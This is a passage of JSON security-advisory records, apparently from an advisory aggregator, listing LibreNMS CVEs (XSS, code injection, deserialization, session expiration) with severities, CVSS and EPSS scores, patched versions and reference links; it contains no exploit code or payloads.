23.9.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-09-15T03:30:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4980","https://github.com/librenms/librenms/commit/cfd642be6a1e988453bd63069d17db3664e7de97","https://huntr.dev/bounties/470b9b13-b7fe-4b3f-a186-fdc5dc193976","https://github.com/advisories/GHSA-qxrq-376q-p39h"],"source_kind":"github","identifiers":["GHSA-qxrq-376q-p39h","CVE-2023-4980"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-09-15T20:05:54.850Z","updated_at":"2026-09-03T00:10:48.238Z","epss_percentage":0.00589,"epss_percentile":0.45604,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xeHJxLTM3NnEtcDM5aM4AA14y","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xeHJxLTM3NnEtcDM5aM4AA14y","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.9.0","vulnerable_version_range":"\u003c 23.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xeHJxLTM3NnEtcDM5aM4AA14y/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tNmpqLWZnbWgtM3A4cs4AA145","url":"https://github.com/advisories/GHSA-m6jj-fgmh-3p8r","title":"LibreNMS Cross-site Scripting vulnerability","description":"Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 23.9.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-09-15T03:30:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4982","https://github.com/librenms/librenms/commit/2c5960631c49f7414f61b6d4dcd305b07da05769","https://huntr.dev/bounties/d3c2dd8a-883c-400e-a1a7-326c3fd37b9e","https://github.com/advisories/GHSA-m6jj-fgmh-3p8r"],"source_kind":"github","identifiers":["GHSA-m6jj-fgmh-3p8r","CVE-2023-4982"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-09-15T20:05:54.816Z","updated_at":"2026-09-03T00:10:48.237Z","epss_percentage":0.00571,"epss_percentile":0.44501,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNmpqLWZnbWgtM3A4cs4AA145","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tNmpqLWZnbWgtM3A4cs4AA145","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.9.0","vulnerable_version_range":"\u003c 23.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNmpqLWZnbWgtM3A4cs4AA145/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01N20yLW1wYzctZ3dneM4AA14x","url":"https://github.com/advisories/GHSA-57m2-mpc7-gwgx","title":"LibreNMS Code Injection vulnerability","description":" Code Injection in GitHub repository librenms/librenms prior to 23.9.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-09-15T03:30:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4977","https://github.com/librenms/librenms/commit/1194934d31c795a3f6877a96ffaa34b1f475bdd0","https://huntr.dev/bounties/3db8a1a4-ca2d-45df-be18-a959ebf82fbc","https://github.com/advisories/GHSA-57m2-mpc7-gwgx"],"source_kind":"github","identifiers":["GHSA-57m2-mpc7-gwgx","CVE-2023-4977"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-09-15T20:05:54.876Z","updated_at":"2026-09-03T00:10:48.238Z","epss_percentage":0.00446,"epss_percentile":0.3656,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01N20yLW1wYzctZ3dneM4AA14x","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01N20yLW1wYzctZ3dneM4AA14x","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.9.0","vulnerable_version_range":"\u003c 23.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01N20yLW1wYzctZ3dneM4AA14x/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xanB3LXJnNTYtamg4ds4AA143","url":"https://github.com/advisories/GHSA-qjpw-rg56-jh8v","title":"LibreNMS Cross-site Scripting vulnerability","description":"Cross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-09-15T03:30:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4978","https://github.com/librenms/librenms/commit/e4c46a45364cb944b94abf9b83f0558b2c4c2fb7","https://huntr.dev/bounties/cefd9295-2053-4e6e-a130-7e1f845728f4","https://github.com/advisories/GHSA-qjpw-rg56-jh8v"],"source_kind":"github","identifiers":["GHSA-qjpw-rg56-jh8v","CVE-2023-4978"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-09-15T20:05:54.893Z","updated_at":"2026-09-03T00:10:48.239Z","epss_percentage":0.00575,"epss_percentile":0.44995,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xanB3LXJnNTYtamg4ds4AA143","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xanB3LXJnNTYtamg4ds4AA143","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.9.0","vulnerable_version_range":"\u003c 23.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xanB3LXJnNTYtamg4ds4AA143/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qcDNjLWc0NnYtamcyY84AA14w","url":"https://github.com/advisories/GHSA-jp3c-g46v-jg2c","title":"LibreNMS Cross-site Scripting vulnerability","description":"Cross-site Scripting (XSS) - Reflected in GitHub repository librenms/librenms prior to 23.9.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-09-15T03:30:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4979","https://github.com/librenms/librenms/commit/49d66fa31b43acef02eaa09ee9af15fe7e16cd03","https://huntr.dev/bounties/e67f8f5d-4048-404f-9b86-cb6b8719b77f","https://github.com/advisories/GHSA-jp3c-g46v-jg2c"],"source_kind":"github","identifiers":["GHSA-jp3c-g46v-jg2c","CVE-2023-4979"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-09-15T20:05:54.863Z","updated_at":"2026-09-03T00:10:48.238Z","epss_percentage":0.00589,"epss_percentile":0.45604,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qcDNjLWc0NnYtamcyY84AA14w","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qcDNjLWc0NnYtamcyY84AA14w","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.9.0","vulnerable_version_range":"\u003c 23.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qcDNjLWc0NnYtamcyY84AA14w/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tNnBmLWNtM2YtNzg3Ns4AA1Tn","url":"https://github.com/advisories/GHSA-m6pf-cm3f-7876","title":"LibreNMS Cross-site Scripting vulnerability","description":"Cross-site Scripting (XSS) - Reflected in GitHub repository librenms/librenms 23.7.0 and prior. A patch is available at commit 91c57a1ee54631e071b6b0c952d99c8ee892e824 and anticiapted to be part of version 23.8.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-08-15T03:31:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.6,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L","references":["https://nvd.nist.gov/vuln/detail/CVE-2023-4347","https://github.com/librenms/librenms/commit/91c57a1ee54631e071b6b0c952d99c8ee892e824","https://huntr.dev/bounties/1f78c6e1-2923-46c5-9376-4cc5a8f1152f","https://github.com/advisories/GHSA-m6pf-cm3f-7876"],"source_kind":"github","identifiers":["GHSA-m6pf-cm3f-7876","CVE-2023-4347"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2023-08-15T21:05:17.526Z","updated_at":"2026-09-03T00:11:19.345Z","epss_percentage":0.69707,"epss_percentile":0.99312,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNnBmLWNtM2YtNzg3Ns4AA1Tn","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tNnBmLWNtM2YtNzg3Ns4AA1Tn","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"23.8.0","vulnerable_version_range":"\u003c= 23.7.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tNnBmLWNtM2YtNzg3Ns4AA1Tn/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1xY2g0LWptZjgteHZwN84AAv9Z","url":"https://github.com/advisories/GHSA-qch4-jmf8-xvp7","title":"Cross-site Scripting in librenms/librenms","description":"Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.10.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-11-20T06:30:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-4067","https://github.com/librenms/librenms/commit/8e85698aa3aa4884c2f3d6c987542477eb64f07c","https://huntr.dev/bounties/3ca7023e-d95c-423f-9e9a-222a67a8ee72","https://github.com/advisories/GHSA-qch4-jmf8-xvp7"],"source_kind":"github","identifiers":["GHSA-qch4-jmf8-xvp7","CVE-2022-4067"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.434Z","updated_at":"2026-09-03T00:12:37.508Z","epss_percentage":0.93712,"epss_percentile":0.9983,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xY2g0LWptZjgteHZwN84AAv9Z","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xY2g0LWptZjgteHZwN84AAv9Z","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xY2g0LWptZjgteHZwN84AAv9Z/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yNGdxLWh2MnItbXJmNc4AAv9c","url":"https://github.com/advisories/GHSA-r4gq-hv2r-mrf5","title":"Cross-site Scripting in librenms/librenms","description":"Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.10.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-11-20T06:30:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-3516","https://github.com/librenms/librenms/commit/8e85698aa3aa4884c2f3d6c987542477eb64f07c","https://huntr.dev/bounties/734bb5eb-715c-4b64-bd33-280300a63748","https://github.com/advisories/GHSA-r4gq-hv2r-mrf5"],"source_kind":"github","identifiers":["GHSA-r4gq-hv2r-mrf5","CVE-2022-3516"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.402Z","updated_at":"2026-09-03T00:12:35.869Z","epss_percentage":0.00472,"epss_percentile":0.38984,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yNGdxLWh2MnItbXJmNc4AAv9c","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yNGdxLWh2MnItbXJmNc4AAv9c","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yNGdxLWh2MnItbXJmNc4AAv9c/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01aDc3LTQyNDUtcGc1cM4AAv9d","url":"https://github.com/advisories/GHSA-5h77-4245-pg5p","title":"Cross-site Scripting in librenms/librenms","description":"Cross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.10.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-11-20T06:30:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-3562","https://github.com/librenms/librenms/commit/43cb72549d90e338f902b359a83c23d3cb5a2645","https://huntr.dev/bounties/bb9f76db-1314-44ae-9ccc-2b69679aa657","https://github.com/advisories/GHSA-5h77-4245-pg5p"],"source_kind":"github","identifiers":["GHSA-5h77-4245-pg5p","CVE-2022-3562"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.426Z","updated_at":"2026-09-03T00:12:37.507Z","epss_percentage":0.94216,"epss_percentile":0.99839,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01aDc3LTQyNDUtcGc1cM4AAv9d","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01aDc3LTQyNDUtcGc1cM4AAv9d","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01aDc3LTQyNDUtcGc1cM4AAv9d/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mM2h3LTNoNzQtd3I5OM4AAv9Y","url":"https://github.com/advisories/GHSA-f3hw-3h74-wr98","title":"Cross-site Scripting in librenms/librenms","description":"A user is able to enable their own account if it was disabled by an admin while the user still holds a valid session. Moreover, the username is not properly sanitized in the admin user overview. This enables an XSS attack that enables an attacker with a low privilege user to execute arbitrary JavaScript in the context of an admin's account.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-11-20T06:30:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.6,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-4068","https://github.com/librenms/librenms/commit/09a2977adb8bc4b1db116c725d661160c930d3a1","https://huntr.dev/bounties/becfecc4-22a6-4f94-bf83-d6030b625fdc","https://github.com/advisories/GHSA-f3hw-3h74-wr98"],"source_kind":"github","identifiers":["GHSA-f3hw-3h74-wr98","CVE-2022-4068"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.443Z","updated_at":"2026-09-03T00:12:37.508Z","epss_percentage":0.34786,"epss_percentile":0.98309,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mM2h3LTNoNzQtd3I5OM4AAv9Y","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mM2h3LTNoNzQtd3I5OM4AAv9Y","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mM2h3LTNoNzQtd3I5OM4AAv9Y/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jdjlnLWg4bW0teHg1aM4AAv9a","url":"https://github.com/advisories/GHSA-cv9g-h8mm-xx5h","title":"Deserialization of Untrusted Data in librenms/librenms","description":"Deserialization of Untrusted Data in GitHub repository librenms/librenms prior to 22.10.0.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2022-11-20T06:30:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-3525","https://github.com/librenms/librenms/commit/ae3925b09ad3c5d0f7a9d5a26ae2f2f778834948","https://huntr.dev/bounties/ed048e8d-87af-440a-a91f-be1e65a40330","https://github.com/advisories/GHSA-cv9g-h8mm-xx5h"],"source_kind":"github","identifiers":["GHSA-cv9g-h8mm-xx5h","CVE-2022-3525"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.409Z","updated_at":"2026-09-03T00:10:46.740Z","epss_percentage":0.00899,"epss_percentile":0.57133,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jdjlnLWg4bW0teHg1aM4AAv9a","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jdjlnLWg4bW0teHg1aM4AAv9a","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jdjlnLWg4bW0teHg1aM4AAv9a/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yNjR3LWd3OWctZmhnas4AAv9b","url":"https://github.com/advisories/GHSA-264w-gw9g-fhgj","title":"Cross-site Scripting in librenms/librenms","description":"Cross-site Scripting (XSS) - Generic in GitHub repository librenms/librenms prior to 22.10.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-11-20T06:30:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-3561","https://github.com/librenms/librenms/commit/d86cbcd96d684e4de8dfa50b4490e4e02782d242","https://huntr.dev/bounties/7389e6eb-4bce-4b97-999d-d3b70d8cee34","https://huntr.com/bounties/7389e6eb-4bce-4b97-999d-d3b70d8cee34","https://github.com/advisories/GHSA-264w-gw9g-fhgj"],"source_kind":"github","identifiers":["GHSA-264w-gw9g-fhgj","CVE-2022-3561"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.418Z","updated_at":"2026-09-03T00:12:37.507Z","epss_percentage":0.00543,"epss_percentile":0.43434,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNjR3LWd3OWctZmhnas4AAv9b","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yNjR3LWd3OWctZmhnas4AAv9b","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNjR3LWd3OWctZmhnas4AAv9b/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wNTVtLWc0bTMtcW1ycM4AAv9X","url":"https://github.com/advisories/GHSA-p55m-g4m3-qmrp","title":"Cross-site Scripting in librenms/librenms","description":"Cross-site Scripting (XSS) - Generic in GitHub repository librenms/librenms prior to 22.10.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-11-20T06:30:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-4069","https://github.com/librenms/librenms/commit/8383376f1355812e09ec0c2af67f6d46891b7ba7","https://huntr.dev/bounties/a9925d98-dac4-4c3c-835a-d93aeecfb2c5","https://github.com/advisories/GHSA-p55m-g4m3-qmrp"],"source_kind":"github","identifiers":["GHSA-p55m-g4m3-qmrp","CVE-2022-4069"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.451Z","updated_at":"2026-09-03T00:12:37.509Z","epss_percentage":0.93343,"epss_percentile":0.99825,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNTVtLWc0bTMtcW1ycM4AAv9X","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wNTVtLWc0bTMtcW1ycM4AAv9X","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNTVtLWc0bTMtcW1ycM4AAv9X/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14OTNqLTNoaDMtNngyM84AAv9W","url":"https://github.com/advisories/GHSA-x93j-3hh3-6x23","title":"Insufficient Session Expiration in librenms/librenms","description":"Insufficient Session Expiration in GitHub repository librenms/librenms prior to 22.10.0.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2022-11-20T06:30:15.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-4070","https://github.com/librenms/librenms/commit/ce8e5f3d056829bfa7a845f9dc2757e21e419ddc","https://huntr.dev/bounties/72d426bb-b56e-4534-88ba-0d11381b0775","https://github.com/advisories/GHSA-x93j-3hh3-6x23"],"source_kind":"github","identifiers":["GHSA-x93j-3hh3-6x23","CVE-2022-4070"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:49.459Z","updated_at":"2026-09-03T00:12:37.509Z","epss_percentage":0.00625,"epss_percentile":0.47543,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OTNqLTNoaDMtNngyM84AAv9W","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14OTNqLTNoaDMtNngyM84AAv9W","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.10.0","vulnerable_version_range":"\u003c 22.10.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OTNqLTNoaDMtNngyM84AAv9W/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zamgyLXdtdjctbTkzMs4AAu6F","url":"https://github.com/advisories/GHSA-3jh2-wmv7-m932","title":"LibreNMS stored Cross-site Scripting via Schedule Maintenance `Title` parameter","description":"LibreNMS versions 22.8.0 and prior allow attackers to execute arbitrary JavaScript code via the Schedule Maintenance `Title` parameter. A patch is available and anticipated to be part of version 22.9.0.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-09-18T00:00:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-3231","https://github.com/librenms/librenms/commit/08050020861230ff96a6507b309cc172a9e70af8","https://huntr.dev/bounties/bcb6ee68-1452-4fdb-932a-f1031d10984f","https://github.com/librenms/librenms/pull/14360","https://github.com/advisories/GHSA-3jh2-wmv7-m932"],"source_kind":"github","identifiers":["GHSA-3jh2-wmv7-m932","CVE-2022-3231"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:57.742Z","updated_at":"2026-09-03T00:12:54.179Z","epss_percentage":0.00593,"epss_percentile":0.45635,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zamgyLXdtdjctbTkzMs4AAu6F","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zamgyLXdtdjctbTkzMs4AAu6F","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.9.0","vulnerable_version_range":"\u003c= 22.8.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zamgyLXdtdjctbTkzMs4AAu6F/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01MjI5LTk0cDMtN3d3cc4AAujV","url":"https://github.com/advisories/GHSA-5229-94p3-7wwq","title":"LibreNMS vulnerable to Cross-Site Scripting (XSS)","description":"LibreNMS version 22.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component print-customoid.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-08-31T00:00:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-36745","https://github.com/librenms/librenms/pull/14126","https://community.librenms.org/t/22-7-0-changelog/19213","https://github.com/librenms/librenms/commit/e5c91a0f835d59e058d9d3e4956e079476d59ee6","https://github.com/advisories/GHSA-5229-94p3-7wwq"],"source_kind":"github","identifiers":["GHSA-5229-94p3-7wwq","CVE-2022-36745"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:56.929Z","updated_at":"2026-09-03T00:12:08.042Z","epss_percentage":0.00484,"epss_percentile":0.39665,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01MjI5LTk0cDMtN3d3cc4AAujV","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01MjI5LTk0cDMtN3d3cc4AAujV","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.7.0","vulnerable_version_range":"\u003c 22.7.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01MjI5LTk0cDMtN3d3cc4AAujV/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zMjV2LWc1dngtd2h4Y84AAujP","url":"https://github.com/advisories/GHSA-325v-g5vx-whxc","title":"LibreNMS vulnerable to Cross-Site Scripting (XSS)","description":"LibreNMS version 22.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component oxidized-cfg-check.inc.php.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2022-08-31T00:00:19.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2022-36746","https://github.com/librenms/librenms/pull/14126","https://github.com/librenms/librenms/commit/e5c91a0f835d59e058d9d3e4956e079476d59ee6","https://github.com/advisories/GHSA-325v-g5vx-whxc"],"source_kind":"github","identifiers":["GHSA-325v-g5vx-whxc","CVE-2022-36746"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2022-12-21T16:11:58.930Z","updated_at":"2026-09-03T00:10:04.958Z","epss_percentage":0.00484,"epss_percentile":0.39666,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zMjV2LWc1dngtd2h4Y84AAujP","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zMjV2LWc1dngtd2h4Y84AAujP","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"22.7.0","vulnerable_version_range":"\u003c 22.7.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zMjV2LWc1dngtd2h4Y84AAujP/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0yM2YyLXZncjYtZnd2N84AArWl","url":"https://github.com/advisories/GHSA-23f2-vgr6-fwv7","title":"Command injection in librenms","description":"LibreNMS v22.3.0 was discovered to contain multiple command injection 